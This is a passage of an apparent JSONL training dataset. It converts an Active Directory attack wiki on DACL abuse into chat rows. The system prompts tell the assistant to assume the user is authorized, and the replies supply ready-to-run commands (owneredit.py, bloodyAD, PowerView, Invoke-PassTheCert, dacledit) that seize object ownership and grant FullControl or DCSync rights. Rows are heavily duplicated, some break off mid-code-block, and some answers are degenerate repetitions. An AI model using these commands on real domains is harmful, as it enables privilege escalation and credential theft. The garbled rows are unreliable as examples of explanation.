NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Grant ownership", "response": "t has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object.\n\nThe attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. For instance, the attacker could change the target object's permissions and grant rights.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's owneredit.py (Python).\n\n``bash\nowneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal\n`\n\n=== Windows\n\nFrom Windows systems, this can be achieved with Set-DomainObjectOwner (PowerView module).\n\n`bash\nSet-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 406, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Grant ownership?"}, {"role": "assistant", "content": "t has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object.\n\nThe attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. For instance, the attacker could change the target object's permissions and grant rights.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's owneredit.py (Python).\n\n``bash\nowneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal\n`\n\n=== Windows\n\nFrom Windows systems, this can be achieved with Set-DomainObjectOwner (PowerView module).\n\n`bash\nSet-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Grant ownership?", "response": "t has the following command-line arguments.This abuse can be carried out when controlling an object that has WriteOwner or GenericAll over any object.\n\nThe attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. For instance, the attacker could change the target object's permissions and grant rights.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's owneredit.py (Python).\n\n``bash\nowneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'\n`\n\nAlternatively, it can be achieved using bloodyAD\n\n`bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal\n`\n\n=== Windows\n\nFrom Windows systems, this can be achieved with Set-DomainObjectOwner (PowerView module).\n\n`bash\nSet-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 406, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the owneredit.py syntax for grant ownership?"}, {"role": "assistant", "content": "owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the owneredit.py syntax for grant ownership?", "response": "owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'", "metadata": {"corpus_index": 407, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "owneredit.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Grant ownership"}, {"role": "assistant", "content": "owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Grant ownership", "response": "owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'", "metadata": {"corpus_index": 407, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'`?"}, {"role": "assistant", "content": "This command is used for grant ownership. Grant ownership"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `owneredit.py -action write -new-owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'`?", "response": "This command is used for grant ownership. Grant ownership", "metadata": {"corpus_index": 407, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the bloodyAD command for grant ownership"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the bloodyAD command for grant ownership", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal", "metadata": {"corpus_index": 408, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "bloodyAD"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Grant ownership"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Grant ownership", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal", "metadata": {"corpus_index": 408, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal`?"}, {"role": "assistant", "content": "This command is used for grant ownership. Grant ownership"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set owner $TargetObject $ControlledPrincipal`?", "response": "This command is used for grant ownership. Grant ownership", "metadata": {"corpus_index": 408, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Set-DomainObjectOwner command to grant ownership"}, {"role": "assistant", "content": "Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Set-DomainObjectOwner command to grant ownership", "response": "Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'", "metadata": {"corpus_index": 409, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Set-DomainObjectOwner"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Grant ownership?"}, {"role": "assistant", "content": "Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Grant ownership?", "response": "Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'", "metadata": {"corpus_index": 409, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'`?"}, {"role": "assistant", "content": "This command is used for grant ownership. Grant ownership"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal'`?", "response": "This command is used for grant ownership. Grant ownership", "metadata": {"corpus_index": 409, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Set the owner of 'Kinda KO. OWNED' user to the one with SID 'S-1-5-21-[...]-1103'. Hence, user with RID 1103 becomes the owner of 'Kinda KO. OWNED'."}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Owner' -OwnerSID 'S-1-5-21-[...]-1103' -Target 'CN=Kinda KO. OWNED,CN=Users,DC=X'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Set the owner of 'Kinda KO. OWNED' user to the one with SID 'S-1-5-21-[...]-1103'. Hence, user with RID 1103 becomes the owner of 'Kinda KO. OWNED'.", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Owner' -OwnerSID 'S-1-5-21-[...]-1103' -Target 'CN=Kinda KO. OWNED,CN=Users,DC=X'", "metadata": {"corpus_index": 410, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Set the owner of 'Kinda KO. OWNED' user to the one with SID 'S-1-5-21-[...]-1103'. Hence, user with RID 1103 becomes the owner of 'Kinda KO. OWNED'."}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Owner' -OwnerSID 'S-1-5-21-[...]-1103' -Target 'CN=Kinda KO. OWNED,CN=Users,DC=X'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Set the owner of 'Kinda KO. OWNED' user to the one with SID 'S-1-5-21-[...]-1103'. Hence, user with RID 1103 becomes the owner of 'Kinda KO. OWNED'.", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'Owner' -OwnerSID 'S-1-5-21-[...]-1103' -Target 'CN=Kinda KO. OWNED,CN=Users,DC=X'", "metadata": {"corpus_index": 410, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Get the owner of user 'John JD. DOE'"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'Owner' -Object 'CN=John JD. DOE,CN=Users,DC=X'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Get the owner of user 'John JD. DOE'", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'Owner' -Object 'CN=John JD. DOE,CN=Users,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 411, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Get the owner of user 'John JD. DOE' during a pentest?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'Owner' -Object 'CN=John JD. DOE,CN=Users,DC=X'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Get the owner of user 'John JD. DOE' during a pentest?", "response": "Invoke-PassTheCert -Action 'LDAPEnum' -LdapConnection $LdapConnection -Enum 'Owner' -Object 'CN=John JD. DOE,CN=Users,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 411, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/grant-ownership.md", "page_title": "Grant ownership", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Grant rights work?"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has WriteDacl over another object.\n\nThe attacker can write a new ACE to the target object’s DACL (Discretionary Access Control List). This can give the attacker full control of the target object.\n\nInstead of giving full control, the same process can be applied to allow an object to DCSync by adding two ACEs with specific Extended Rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Giving full control leads to the same thing since GenericAll includes all ExtendedRights, hence the two extended rights needed for DCSync to work.\n\nStory time, Exchange Servers used to have WriteDacl over domain objects, allowing attackers to conduct a PrivExchange attack where control would be gained over an Exchange Server which would then be used to grant an attacker-controlled object DCSync privileges to the domain.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Grant rights work?", "response": "This abuse can be carried out when controlling an object that has WriteDacl over another object.\n\nThe attacker can write a new ACE to the target object’s DACL (Discretionary Access Control List). This can give the attacker full control of the target object.\n\nInstead of giving full control, the same process can be applied to allow an object to DCSync by adding two ACEs with specific Extended Rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Giving full control leads to the same thing since GenericAll includes all ExtendedRights, hence the two extended rights needed for DCSync to work.\n\nStory time, Exchange Servers used to have WriteDacl over domain objects, allowing attackers to conduct a PrivExchange attack where control would be gained over an Exchange Server which would then be used to grant an attacker-controlled object DCSync privileges to the domain.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n```bash", "metadata": {"corpus_index": 412, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Grant rights"}, {"role": "assistant", "content": "This abuse can be carried out when controlling an object that has WriteDacl over another object.\n\nThe attacker can write a new ACE to the target object’s DACL (Discretionary Access Control List). This can give the attacker full control of the target object.\n\nInstead of giving full control, the same process can be applied to allow an object to DCSync by adding two ACEs with specific Extended Rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Giving full control leads to the same thing since GenericAll includes all ExtendedRights, hence the two extended rights needed for DCSync to work.\n\nStory time, Exchange Servers used to have WriteDacl over domain objects, allowing attackers to conduct a PrivExchange attack where control would be gained over an Exchange Server which would then be used to grant an attacker-controlled object DCSync privileges to the domain.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Grant rights", "response": "This abuse can be carried out when controlling an object that has WriteDacl over another object.\n\nThe attacker can write a new ACE to the target object’s DACL (Discretionary Access Control List). This can give the attacker full control of the target object.\n\nInstead of giving full control, the same process can be applied to allow an object to DCSync by adding two ACEs with specific Extended Rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Giving full control leads to the same thing since GenericAll includes all ExtendedRights, hence the two extended rights needed for DCSync to work.\n\nStory time, Exchange Servers used to have WriteDacl over domain objects, allowing attackers to conduct a PrivExchange attack where control would be gained over an Exchange Server which would then be used to grant an attacker-controlled object DCSync privileges to the domain.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n```bash", "metadata": {"corpus_index": 412, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Give full control work?"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Give full control work?", "response": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 413, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Give full control?"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Give full control?", "response": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 413, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)?"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'DCSync' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nFor a DCSync granting attack, instead of using dacledit, ntlmrelayx has the ability to operate that abuse with the --escalate-user option (see this).\n\nTo enable inheritance, the -inheritance switch can be added to the command. Then it is possible to find interesting targets with AdminCount=0in BloodHound for example, by looking at the object attributs.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)?", "response": "dacledit.py -action 'write' -rights 'DCSync' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nFor a DCSync granting attack, instead of using dacledit, ntlmrelayx has the ability to operate that abuse with the --escalate-user option (see this).\n\nTo enable inheritance, the -inheritance switch can be added to the command. Then it is possible to find interesting targets with AdminCount=0in BloodHound for example, by looking at the object attributs.\n\n``bash", "metadata": {"corpus_index": 414, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'DCSync' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nFor a DCSync granting attack, instead of using dacledit, ntlmrelayx has the ability to operate that abuse with the --escalate-user option (see this).\n\nTo enable inheritance, the -inheritance switch can be added to the command. Then it is possible to find interesting targets with AdminCount=0in BloodHound for example, by looking at the object attributs.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Give DCSync (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All)", "response": "dacledit.py -action 'write' -rights 'DCSync' -principal 'controlled_object' -target 'target_object' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n``\n\nFor a DCSync granting attack, instead of using dacledit, ntlmrelayx has the ability to operate that abuse with the --escalate-user option (see this).\n\nTo enable inheritance, the -inheritance switch can be added to the command. Then it is possible to find interesting targets with AdminCount=0in BloodHound for example, by looking at the object attributs.\n\n``bash", "metadata": {"corpus_index": 414, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the For command for give dcsync (ds-replication-get-changes, ds-replication-get-changes-all)"}, {"role": "assistant", "content": "For a DCSync granting attack, instead of using dacledit, [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) has the ability to operate that abuse with the `--escalate-user` option (see [this](https://medium.com/@arkanoidctf/hackthebox-writeup-forest-4db0de793f96)).\n\nTo enable inheritance, the `-inheritance` switch can be added to the command. Then it is possible to find interesting targets with `AdminCount=0`in BloodHound for example, by looking at the object attributs."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags 